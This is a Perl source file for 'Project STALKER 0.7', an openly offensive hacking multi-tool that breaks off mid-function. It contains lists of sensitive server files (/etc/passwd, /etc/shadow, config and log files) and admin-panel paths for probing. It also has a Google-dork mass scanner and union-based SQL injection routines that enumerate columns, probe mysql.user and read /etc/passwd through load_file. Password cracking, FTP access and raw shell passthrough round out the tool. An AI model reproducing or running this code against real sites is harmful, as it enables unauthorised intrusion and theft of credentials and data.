#!/usr/bin/perl
  2. #Project STALKER 0.7
  3. #(C) Doddy Hackman 2011
  4. #
  5. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  6. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  7. #ppm install http://www.bribes.org/perl/ppm/Net-Whois-Raw.ppd
  8. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  9.  
  10. use IO::Socket;
  11. use HTML::LinkExtor;
  12. use LWP::UserAgent;
  13. use Win32::OLE qw(in);
  14. use Win32::Process;
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split qw(uri_split);
  18. use MIME::Base64;
  19. use DBI;
  20. use Net::Whois::Raw;
  21. use Color::Output;
  22. Color::Output::Init
  23.  
  24. my @files = (
  25. 'C:/xampp/htdocs/aca.txt',
  26. 'C:/xampp/htdocs/aca.txt',
  27. 'C:/xampp/htdocs/admin.php',
  28. 'C:/xampp/htdocs/leer.txt',
  29. '../../../boot.ini',
  30. '../../../../boot.ini',
  31. '../../../../../boot.ini',
  32. '../../../../../../boot.ini',
  33. '/etc/passwd',
  34. '/etc/shadow',
  35. '/etc/shadow~',
  36. '/etc/hosts',
  37. '/etc/motd',
  38. '/etc/apache/apache.conf',
  39. '/etc/fstab',
  40. '/etc/apache2/apache2.conf',
  41. '/etc/apache/httpd.conf',
  42. '/etc/httpd/conf/httpd.conf',
  43. '/etc/apache2/httpd.conf',
  44. '/etc/apache2/sites-available/default',
  45. '/etc/mysql/my.cnf',
  46. '/etc/my.cnf',
  47. '/etc/sysconfig/network-scripts/ifcfg-eth0',
  48. '/etc/redhat-release',
  49. '/etc/httpd/conf.d/php.conf',
  50. '/etc/pam.d/proftpd',
  51. '/etc/phpmyadmin/config.inc.php',
  52. '/var/www/config.php',
  53. '/etc/httpd/logs/error_log',
  54. '/etc/httpd/logs/error.log',
  55. '/etc/httpd/logs/access_log',
  56. '/etc/httpd/logs/access.log',
  57. '/var/log/apache/error_log',
  58. '/var/log/apache/error.log',
  59. '/var/log/apache/access_log',
  60. '/var/log/apache/access.log',
  61. '/var/log/apache2/error_log',
  62. '/var/log/apache2/error.log',
  63. '/var/log/apache2/access_log',
  64. '/var/log/apache2/access.log',
  65. '/var/www/logs/error_log',
  66. '/var/www/logs/error.log',
  67. '/var/www/logs/access_log',
  68. '/var/www/logs/access.log',
  69. '/usr/local/apache/logs/error_log',
  70. '/usr/local/apache/logs/error.log',
  71. '/usr/local/apache/logs/access_log',
  72. '/usr/local/apache/logs/access.log',
  73. '/var/log/error_log',
  74. '/var/log/error.log',
  75. '/var/log/access_log',
  76. '/var/log/access.log',
  77. '/etc/group',
  78. '/etc/security/group',
  79. '/etc/security/passwd',
  80. '/etc/security/user',
  81. '/etc/security/environ',
  82. '/etc/security/limits',
  83. '/usr/lib/security/mkuser.default',
  84. '/apache/logs/access.log',
  85. '/apache/logs/error.log',
  86. '/etc/httpd/logs/acces_log',
  87. '/etc/httpd/logs/acces.log',
  88. '/var/log/httpd/access_log',
  89. '/var/log/httpd/error_log',
  90. '/apache2/logs/error.log',
  91. '/apache2/logs/access.log',
  92. '/logs/error.log',
  93. '/logs/access.log',
  94. '/usr/local/apache2/logs/access_log',
  95. '/usr/local/apache2/logs/access.log',
  96. '/usr/local/apache2/logs/error_log',
  97. '/usr/local/apache2/logs/error.log',
  98. '/var/log/httpd/access.log',
  99. '/var/log/httpd/error.log',
  100. '/opt/lampp/logs/access_log',
  101. '/opt/lampp/logs/error_log',
  102. '/opt/xampp/logs/access_log',
  103. '/opt/xampp/logs/error_log',
  104. '/opt/lampp/logs/access.log',
  105. '/opt/lampp/logs/error.log',
  106. '/opt/xampp/logs/access.log',
  107. '/opt/xampp/logs/error.log',
  108. 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  109. 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  110. '/usr/local/apache/conf/httpd.conf',
  111. '/usr/local/apache2/conf/httpd.conf',
  112. '/etc/apache/conf/httpd.conf',
  113. '/usr/local/etc/apache/conf/httpd.conf',
  114. '/usr/local/apache/httpd.conf',
  115. '/usr/local/apache2/httpd.conf',
  116. '/usr/local/httpd/conf/httpd.conf',
  117. '/usr/local/etc/apache2/conf/httpd.conf',
  118. '/usr/local/etc/httpd/conf/httpd.conf',
  119. '/usr/apache2/conf/httpd.conf',
  120. '/usr/apache/conf/httpd.conf',
  121. '/usr/local/apps/apache2/conf/httpd.conf',
  122. '/usr/local/apps/apache/conf/httpd.conf',
  123. '/etc/apache2/conf/httpd.conf',
  124. '/etc/http/conf/httpd.conf',
  125. '/etc/httpd/httpd.conf',
  126. '/etc/http/httpd.conf',
  127. '/etc/httpd.conf',
  128. '/opt/apache/conf/httpd.conf',
  129. '/opt/apache2/conf/httpd.conf',
  130. '/var/www/conf/httpd.conf',
  131. '/private/etc/httpd/httpd.conf',
  132. '/private/etc/httpd/httpd.conf.default',
  133. '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  134. '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  135. '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  136. 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  137. 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  138. 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  139. '/usr/local/php/httpd.conf.php',
  140. '/usr/local/php4/httpd.conf.php',
  141. '/usr/local/php5/httpd.conf.php',
  142. '/usr/local/php/httpd.conf',
  143. '/usr/local/php4/httpd.conf',
  144. '/usr/local/php5/httpd.conf',
  145. '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  146. '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  147. '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  148. '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  149. '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  150. '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  151. '/usr/local/etc/apache/vhosts.conf',
  152. '/etc/php.ini',
  153. '/bin/php.ini',
  154. '/etc/httpd/php.ini',
  155. '/usr/lib/php.ini',
  156. '/usr/lib/php/php.ini',
  157. '/usr/local/etc/php.ini',
  158. '/usr/local/lib/php.ini',
  159. '/usr/local/php/lib/php.ini',
  160. '/usr/local/php4/lib/php.ini',
  161. '/usr/local/php5/lib/php.ini',
  162. '/usr/local/apache/conf/php.ini',
  163. '/etc/php4.4/fcgi/php.ini',
  164. '/etc/php4/apache/php.ini',
  165. '/etc/php4/apache2/php.ini',
  166. '/etc/php5/apache/php.ini',
  167. '/etc/php5/apache2/php.ini',
  168. '/etc/php/php.ini',
  169. '/etc/php/php4/php.ini',
  170. '/etc/php/apache/php.ini',
  171. '/etc/php/apache2/php.ini',
  172. '/web/conf/php.ini',
  173. '/usr/local/Zend/etc/php.ini',
  174. '/opt/xampp/etc/php.ini',
  175. '/var/local/www/conf/php.ini',
  176. '/etc/php/cgi/php.ini',
  177. '/etc/php4/cgi/php.ini',
  178. '/etc/php5/cgi/php.ini',
  179. 'c:\php5\php.ini',
  180. 'c:\php4\php.ini',
  181. 'c:\php\php.ini',
  182. 'c:\PHP\php.ini',
  183. 'c:\WINDOWS\php.ini',
  184. 'c:\WINNT\php.ini',
  185. 'c:\apache\php\php.ini',
  186. 'c:\xampp\apache\bin\php.ini',
  187. 'c:\NetServer\bin\stable\apache\php.ini',
  188. 'c:\home2\bin\stable\apache\php.ini',
  189. 'c:\home\bin\stable\apache\php.ini',
  190. '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  191. '/usr/local/cpanel/logs',
  192. '/usr/local/cpanel/logs/stats_log',
  193. '/usr/local/cpanel/logs/access_log',
  194. '/usr/local/cpanel/logs/error_log',
  195. '/usr/local/cpanel/logs/license_log',
  196. '/usr/local/cpanel/logs/login_log',
  197. '/var/cpanel/cpanel.config',
  198. '/var/log/mysql/mysql-bin.log',
  199. '/var/log/mysql.log',
  200. '/var/log/mysqlderror.log',
  201. '/var/log/mysql/mysql.log',
  202. '/var/log/mysql/mysql-slow.log',
  203. '/var/mysql.log',
  204. '/var/lib/mysql/my.cnf',
  205. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  206. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  207. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  208. 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  209. 'C:\ProgramFiles\MySQL\data\hostname.err',
  210. 'C:\ProgramFiles\MySQL\data\mysql.log',
  211. 'C:\ProgramFiles\MySQL\data\mysql.err',
  212. 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  213. 'C:\MySQL\data\hostname.err',
  214. 'C:\MySQL\data\mysql.log',
  215. 'C:\MySQL\data\mysql.err',
  216. 'C:\MySQL\data\mysql-bin.log',
  217. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  218. 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  219. 'C:\ProgramFiles\MySQL\my.ini',
  220. 'C:\ProgramFiles\MySQL\my.cnf',
  221. 'C:\MySQL\my.ini',
  222. 'C:\MySQL\my.cnf',
  223. '/etc/logrotate.d/proftpd',
  224. '/www/logs/proftpd.system.log',
  225. '/var/log/proftpd',
  226. '/etc/proftp.conf',
  227. '/etc/protpd/proftpd.conf',
  228. '/etc/vhcs2/proftpd/proftpd.conf',
  229. '/etc/proftpd/modules.conf',
  230. '/var/log/vsftpd.log',
  231. '/etc/vsftpd.chroot_list',
  232. '/etc/logrotate.d/vsftpd.log',
  233. '/etc/vsftpd/vsftpd.conf',
  234. '/etc/vsftpd.conf',
  235. '/etc/chrootUsers',
  236. '/var/log/xferlog',
  237. '/var/adm/log/xferlog',
  238. '/etc/wu-ftpd/ftpaccess',
  239. '/etc/wu-ftpd/ftphosts',
  240. '/etc/wu-ftpd/ftpusers',
  241. '/usr/sbin/pure-config.pl',
  242. '/usr/etc/pure-ftpd.conf',
  243. '/etc/pure-ftpd/pure-ftpd.conf',
  244. '/usr/local/etc/pure-ftpd.conf',
  245. '/usr/local/etc/pureftpd.pdb',
  246. '/usr/local/pureftpd/etc/pureftpd.pdb',
  247. '/usr/local/pureftpd/sbin/pure-config.pl',
  248. '/usr/local/pureftpd/etc/pure-ftpd.conf',
  249. '/etc/pure-ftpd/pure-ftpd.pdb',
  250. '/etc/pureftpd.pdb',
  251. '/etc/pureftpd.passwd',
  252. '/etc/pure-ftpd/pureftpd.pdb',
  253. '/var/log/pure-ftpd/pure-ftpd.log',
  254. '/logs/pure-ftpd.log',
  255. '/var/log/pureftpd.log',
  256. '/var/log/ftp-proxy/ftp-proxy.log',
  257. '/var/log/ftp-proxy',
  258. '/var/log/ftplog',
  259. '/etc/logrotate.d/ftp',
  260. '/etc/ftpchroot',
  261. '/etc/ftphosts',
  262. '/var/log/exim_mainlog',
  263. '/var/log/exim/mainlog',
  264. '/var/log/maillog',
  265. '/var/log/exim_paniclog',
  266. '/var/log/exim/paniclog',
  267. '/var/log/exim/rejectlog',
  268. '/var/log/exim_rejectlog'
  269. );
  270.  
  271. @panels = (
  272. 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx'
  273. , 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp',
  274. 'admin/webmaster.aspx'
  275. , 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
  276. 'asp/admin/admin.aspx'
  277. , 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/',
  278. 'login.asp', 'login.aspx'
  279. , 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
  280. 'login/index.asp', 'login/index.aspx'
  281. , 'login/login.asp', 'login/login.aspx', 'login/admin.asp',
  282. 'login/admin.aspx'
  283. , 'administracion/index.asp', 'administracion/index.aspx',
  284. 'administracion/login.asp'
  285. , 'administracion/login.aspx', 'administracion/webmaster.asp',
  286. 'administracion/webmaster.aspx'
  287. , 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
  288. 'admin/admin.php'
  289. , 'admin/index.php', 'admin/login.php', 'admin/system.php',
  290. 'admin/ingresar.php'
  291. , 'admin/administrador.php', 'admin/default.php', 'administracion/',
  292. 'administracion/index.php'
  293. , 'administracion/login.php', 'administracion/ingresar.php',
  294. 'administracion/admin.php'
  295. , 'administration/', 'administration/index.php', 'administration/login.php'
  296. , 'administrator/index.php', 'administrator/login.php',
  297. 'administrator/system.php', 'system/'
  298. , 'system/login.php', 'admin.php', 'login.php', 'administrador.php',
  299. 'administration.php'
  300. , 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php',
  301. 'admin2.html', 'yonetim.php'
  302. , 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
  303. 'admin/account.php', 'admin/account.html'
  304. , 'admin/index.html', 'admin/login.html', 'admin/home.php',
  305. 'admin/controlpanel.html'
  306. , 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
  307. 'cp.php', 'cp.html'
  308. , 'administrator/', 'administrator/index.html', 'administrator/login.html'
  309. , 'administrator/account.html', 'administrator/account.php',
  310. 'administrator.html', 'login.html'
  311. , 'modelsearch/login.php', 'moderator.php', 'moderator.html',
  312. 'moderator/login.php'
  313. , 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
  314. 'moderator/'
  315. , 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php',
  316. 'controlpanel.html'
  317. , 'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
  318. 'adminpanel.html', 'admin1.asp'
  319. , 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
  320. 'admin/home.asp'
  321. , 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
  322. 'administrator/index.asp'
  323. , 'administrator/login.asp', 'administrator/account.asp',
  324. 'administrator.asp'
  325. , 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
  326. 'moderator/admin.asp'
  327. , 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
  328. 'fileadmin/'
  329. , 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html',
  330. 'sysadmin.php'
  331. , 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/',
  332. 'ur-admin.asp'
  333. , 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html'
  334. , 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html'
  335. , 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php',
  336. 'webadmin.asp'
  337. , 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp'
  338. , 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/'
  339. , 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/',
  340. 'administrators/'
  341. , 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/',
  342. 'SysAdmin/'
  343. , 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/',
  344. 'cpanel/'
  345. , 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/',
  346. 'formslogin/
  347. ', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/
  348. ', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
  349. 'login-redirect/
  350. ', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/',
  351. 'smblogin/
  352. ', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/',
  353. 'bigadmin/'
  354. , 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/',
  355. 'openvpnadmin/'
  356. , 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
  357. 'newsadmin/', 'adminpro/'
  358. , 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/',
  359. 'ccp14admin/'
  360. , 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/'
  361. , 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/'
  362. , 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/'
  363. , 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
  364. 'logo_sysadmin/'
  365. , 'server/', 'database_administration/', 'power_user/',
  366. 'system_administration/'
  367. , 'ss_vms_admin_sm/'
  368. );
  369.  
  370. unless ( -d "/logs/webs" ) {
  371. mkdir( "logs/", 777 );
  372. mkdir( "logs/webs/", 777 );
  373. }
  374.  
  375. my $nave = LWP::UserAgent->new;
  376. $nave->agent(
  377. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  378. );
  379. $nave->timeout(5);
  380.  
head();

getinfo();

# Ctrl-C is routed to a sub called "next" (\&next is a reference to
# &main::next, not the loop keyword). No such sub is defined in the part of the
# file shown here; unless it exists further down, an interrupt would die with
# "Undefined subroutine &main::next" — TODO confirm.
$SIG{INT} = \&next;

# Main read-eval loop: menujo() reads one command line and dispatches it.
# Several sub-menus leave via a bare `next`, which (with a warning) unwinds
# the sub calls and lands back here. "\x037" is "\x03" followed by "7" — a
# Color::Output colour code — and "\x030" returns to colour 0.
while (1) {
cprint "\x037"; # colour 7 for the prompt
menujo();
cprint "\x030";
}
  392.  
  393. sub getinfo {
  394. $so = $^O;
  395. $login = Win32::LoginName();
  396. $domain = Win32::DomainName();
  397. cprint "\x0313"; #13
  398. print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  399. cprint "\x030";
  400. }
  401.  
  402. sub menujo {
  403. print "\n\n>";
  404. chomp( my $cmd = <stdin> );
  405. print "\n\n";
  406.  
  407. if ( $cmd =~ /getinfo/ig ) {
  408. getinfo();
  409. }
  410. if ( $cmd =~ /getip (.*)/ ) {
  411. my $te = $1;
  412. if ( $te eq "" or $te eq " " ) {
  413. print "\n[+] sintax : getip <host>\n";
  414. }
  415. print "\n[IP] : " . getip($1) . "\n";
  416. print "\n";
  417. }
  418.  
  419. elsif ( $cmd =~ /whois (.*)/ ) {
  420. my $te = $1;
  421. if ( $te eq "" or $te eq " " ) {
  422. print "\n[+] sintax : whois <host>\n";
  423. }
  424. print "[+] Getting data\n\n";
  425. print whois($te);
  426. print "\n\n";
  427. }
  428.  
  429. elsif ( $cmd =~ /locate (.*)/ ) {
  430. my $te = $1;
  431. if ( $te eq "" or $te eq " " ) {
  432. print "\n[+] sintax : locate <host>\n";
  433. }
  434. infocon($te);
  435. print "\n\n";
  436. }
  437.  
  438. elsif ( $cmd =~ /getlink (.*)/ ) {
  439. print "[+] Extracting links in the page\n\n\n";
  440. $code = toma($1);
  441. my @re = get_links($code);
  442. for my $url (@re) {
  443. print "[Link] : $url\n";
  444. }
  445. print "\n\n[+] Finish\n";
  446. }
  447.  
  448. elsif ( $cmd =~ /help/ ) {
  449. helpme();
  450. }
  451.  
  452. elsif ( $cmd =~ /getprocess/ ) {
  453. my %re = getprocess();
  454.  
  455. for my $data ( keys %re ) {
  456. ( $proceso, $pid ) = ( $t =~ /(.*):(.*)/ig );
  457. print "[+] Proceso : " . $data . "\n";
  458. print "[+] PID : " . $re{$data} . "\n\n";
  459. }
  460. }
  461. elsif ( $cmd =~ /killprocess (.*)/ ) {
  462. my $d = $1;
  463. if ( killprocess($d) ) {
  464. print "[+] Process closed\n";
  465. }
  466. }
  467. elsif ( $cmd =~ /conec (.*) (.*) (.*)/ ) {
  468. print conectar( $1, $2, $3 );
  469. }
  470. elsif ( $cmd =~ /allow (.*)/ ) {
  471. $re = conectar( $1, "80", "GET / HTTP/1.0\r\n" );
  472. if ( $re =~ /Allow:(.*)/ig ) {
  473. print "[+] Metodos : " . $1 . "\n";
  474. }
  475. }
  476. elsif ( $cmd =~ /paths (.*)/ ) {
  477. scanpaths($1);
  478. }
  479. elsif ( $cmd =~ /encodehex (.*)/ ) {
  480. print "\n\n[+] " . hex_en($1) . "\n\n";
  481. }
  482. elsif ( $cmd =~ /decodehex (.*)/ ) {
  483. print "\n\n[+] " . hex_de($1) . "\n\n";
  484. }
  485. elsif ( $cmd =~ /download (.*) (.*)/ ) {
  486. my $file, $name = $1, $2;
  487. if ( download( $1, $2 ) ) {
  488. print "[+] File downloaded\n";
  489. }
  490. }
  491. elsif ( $cmd =~ /encodeascii (.*)/ ) {
  492. print "\n\n[+] " . ascii($1) . "\n\n";
  493. }
  494. elsif ( $cmd =~ /decodeascii (.*)/ ) {
  495. print "\n\n[+] " . ascii_de($1) . "\n\n";
  496. }
  497. elsif ( $cmd =~ /encodebase (.*)/ ) {
  498. print "\n\n[+] " . base($1) . "\n\n";
  499. }
  500. elsif ( $cmd =~ /decodebase (.*)/ ) {
  501. print "\n\n[+] " . base_de($1) . "\n\n";
  502. }
  503. elsif ( $cmd =~ /aboutme/ ) {
  504. aboutme();
  505. }
  506. elsif ( $cmd =~ /scanport (.*)/ ) {
  507. scanport($1);
  508. }
  509. elsif ( $cmd =~ /panel (.*)/ ) {
  510. scanpanel($1);
  511. }
  512. elsif ( $cmd =~ /scangoogle/ ) {
  513. print "[Dork] : ";
  514. chomp( my $dork = <stdin> );
  515. print "\n\n[Pages] : ";
  516. chomp( my $pages = <stdin> );
  517. print "\n\n[Starting the search]\n\n";
  518. my @links = google( $dork, $pages );
  519. print "\n[Links Found] : " . int(@links) . "\n\n\n";
  520. print "[Starting the scan]\n\n\n";
  521.  
  522. for my $link (@links) {
  523. if ( $link =~ /(.*)=/ig ) {
  524. my $web = $1;
  525. sql( $web . "=" );
  526. }
  527. }
  528. print "\n\n[+] Finish\n";
  529. }
  530. elsif ( $cmd =~ /getpass (.*)/ ) {
  531. crackit($1);
  532. }
  533. elsif ( $cmd =~ /ftp (.*) (.*) (.*)/ ) {
  534. ftp( $1, $2, $3 );
  535. }
  536. elsif ( $cmd =~ /navegator/ ) {
  537. nave:
  538. print getcwd() . ">";
  539. chomp( my $rta = <stdin> );
  540. print "\n\n";
  541. if ( $rta =~ /list/ ) {
  542. my @files = coleccionar( getcwd() );
  543. for (@files) {
  544. if ( -f $_ ) {
  545. print "[File] : " . $_ . "\n";
  546. }
  547. else {
  548. print "[Directory] : " . $_ . "\n";
  549. }
  550. }
  551. }
  552. if ( $rta =~ /cd (.*)/ ) {
  553. my $dir = $1;
  554. if ( chdir($dir) ) {
  555. print "\n[+] Directory changed\n";
  556. }
  557. else {
  558. print "\n[-] Error\n";
  559. }
  560. }
  561. if ( $rta =~ /del (.*)/ ) {
  562. my $file = getcwd() . "/" . $1;
  563. if ( -f $file ) {
  564. if ( unlink($file) ) {
  565. print "\n[+] File Deleted\n";
  566. }
  567. else {
  568. print "\n[-] Error\n";
  569. }
  570. }
  571. else {
  572. if ( rmdir($file) ) {
  573. print "\n[+] Directory Deleted\n";
  574. }
  575. else {
  576. print "\n[-] Error\n";
  577. }
  578. }
  579. }
  580. if ( $rta =~ /rename (.*) (.*)/ ) {
  581. if ( rename( getcwd() . "/" . $1, getcwd() . "/" . $2 ) ) {
  582. print "\n[+] File Changed\n";
  583. }
  584. else {
  585. print "\n[-] Error\n";
  586. }
  587. }
  588. if ( $rta =~ /open (.*)/ ) {
  589. my $file = $1;
  590. chomp $file;
  591. system($file);
  592.  
  593. #system(getcwd()."/".$file);
  594. }
  595. if ( $rta =~ /help/ ) {
  596. print "\nCommands : help cd list del rename open exit\n\n";
  597. }
  598. if ( $rta =~ /exit/ ) {
  599. next;
  600. }
  601. print "\n\n";
  602. goto nave;
  603. }
  604. elsif ( $cmd =~ /kobra (.*)/ ) {
  605. my $url = $1;
  606. chomp $url;
  607. scansqli( $url, "--" );
  608. }
  609. elsif ( $cmd =~ /mysql (.*) (.*) (.*)/ ) {
  610. enter( $1, $2, $3 );
  611. }
  612. elsif ( $cmd =~ /exit/ ) {
  613. copyright();
  614. <stdin>;
  615. exit(1);
  616. }
  617. else {
  618. system($cmd);
  619. }
  620.  
  621. #print "\n\n";
  622. }
  623.  
  624. sub scansqli {
  625.  
  626. my $page = $_[0];
  627. print "[Status] : Scanning.....\n";
  628. ( $pass1, $bypass2 ) = &bypass( $_[1] );
  629. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  630. my $save = $auth;
  631.  
  632. if ( $_[0] =~ /hackman/ig ) {
  633. savefile( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
  634. &menu_options( $_[0], $pass, $save );
  635. }
  636. else {
  637.  
  638. my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
  639. my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
  640.  
  641. unless ( $testar1 eq $testar2 ) {
  642. motor( $page, $_[1] );
  643. }
  644. else {
  645. print "\n[-] Not vulnerable\n\n";
  646. print "[+] Scan anyway y/n : ";
  647. chomp( my $op = <stdin> );
  648. if ( $op eq "y" ) {
  649. motor( $page, $_[1] );
  650. }
  651. else {
  652.  
  653. #head();
  654. #menu();
  655. }
  656. }
  657. }
  658. }
  659.  
  660. sub motor {
  661.  
  662. my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
  663.  
  664. if ( $control eq 1 ) {
  665. print "[Status] : Enjoy the menu\n\n";
  666. &menu_options( $gen, $pass, $save );
  667. }
  668. else {
  669. print "[Status] : Length columns not found\n\n";
  670. }
  671. }
  672.  
  673. sub length {
  674. print "\n[+] Looking for the number of columns\n\n";
  675. my $rows = "0";
  676. my $asc;
  677. my $page = $_[0];
  678. ( $pass1, $pass2 ) = &bypass( $_[1] );
  679.  
  680. $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
  681. $total = "1";
  682. for my $rows ( 2 .. 200 ) {
  683. $asc .=
  684. "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
  685. $total .= "," . $rows;
  686. $injection =
  687. $page . "1"
  688. . $pass1 . "and"
  689. . $pass1 . "1=0"
  690. . $pass1 . "union"
  691. . $pass1
  692. . "select"
  693. . $pass1
  694. . $alert
  695. . $asc;
  696. $test = toma($injection);
  697. if ( $test =~ /RATSXPDOWN/ ) {
  698. @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  699. $control = 1;
  700. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  701. my $save = $auth;
  702. savefile( $save . ".txt", "\n[Target confirmed] : $page" );
  703. savefile( $save . ".txt", "[Bypass] : $_[1]\n" );
  704. savefile( $save . ".txt", "[Limit] : The site has $rows columns" );
  705. savefile( $save . ".txt",
  706. "[Data] : The number @number print data" );
  707. $total =~ s/$number[0]/hackman/;
  708. savefile(
  709. $save . ".txt",
  710. "[SQLI] : "
  711. . $page . "1"
  712. . $pass1 . "and"
  713. . $pass1 . "1=0"
  714. . $pass1 . "union"
  715. . $pass1
  716. . "select"
  717. . $pass1
  718. . $total
  719. );
  720. return (
  721. $page . "1"
  722. . $pass1 . "and"
  723. . $pass1 . "1=0"
  724. . $pass1 . "union"
  725. . $pass1
  726. . "select"
  727. . $pass1
  728. . $total,
  729. $save, $control
  730. );
  731. }
  732. }
  733. }
  734.  
  735. sub details {
  736. my ( $page, $bypass, $save ) = @_;
  737. ( $pass1, $pass2 ) = &bypass($bypass);
  738. savefile( $save . ".txt", "\n" );
  739. if ( $page =~ /(.*)hackman(.*)/ig ) {
  740. print "\n[+] Searching information..\n\n";
  741. my ( $start, $end ) = ( $1, $2 );
  742. $inforschema =
  743. $start
  744. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  745. . $end
  746. . $pass1 . "from"
  747. . $pass1
  748. . "information_schema.tables"
  749. . $pass2;
  750. $mysqluser =
  751. $start
  752. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
  753. . $end
  754. . $pass1 . "from"
  755. . $pass1
  756. . "mysql.user"
  757. . $pass2;
  758. $test3 =
  759. toma( $start
  760. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  761. . $end
  762. . $pass2 );
  763. $test1 = toma($inforschema);
  764. $test2 = toma($mysqluser);
  765. if ( $test2 =~ /ERTOR854/ig ) {
  766. savefile( $save . ".txt", "[mysql.user] : ON" );
  767. print "[mysql.user] : ON\n";
  768. }
  769. else {
  770. print "[mysql.user] : OFF\n";
  771. savefile( $save . ".txt", "[mysql.user] : OFF" );
  772. }
  773. if ( $test1 =~ /ERTOR854/ig ) {
  774. print "[information_schema.tables] : ON\n";
  775. savefile( $save . ".txt", "[information_schema.tables] : ON" );
  776. }
  777. else {
  778. print "[information_schema.tables] : OFF\n";
  779. savefile( $save . ".txt", "[information_schema.tables] : OFF" );
  780. }
  781. if ( $test3 =~ /ERTOR854/ig ) {
  782. print "[load_file] : ON\n";
  783. savefile(
  784. $save . ".txt",
  785. "[load_file] : "
  786. . $start
  787. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
  788. . $end
  789. . $pass2
  790. );
  791. }
  792. $concat =
  793. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
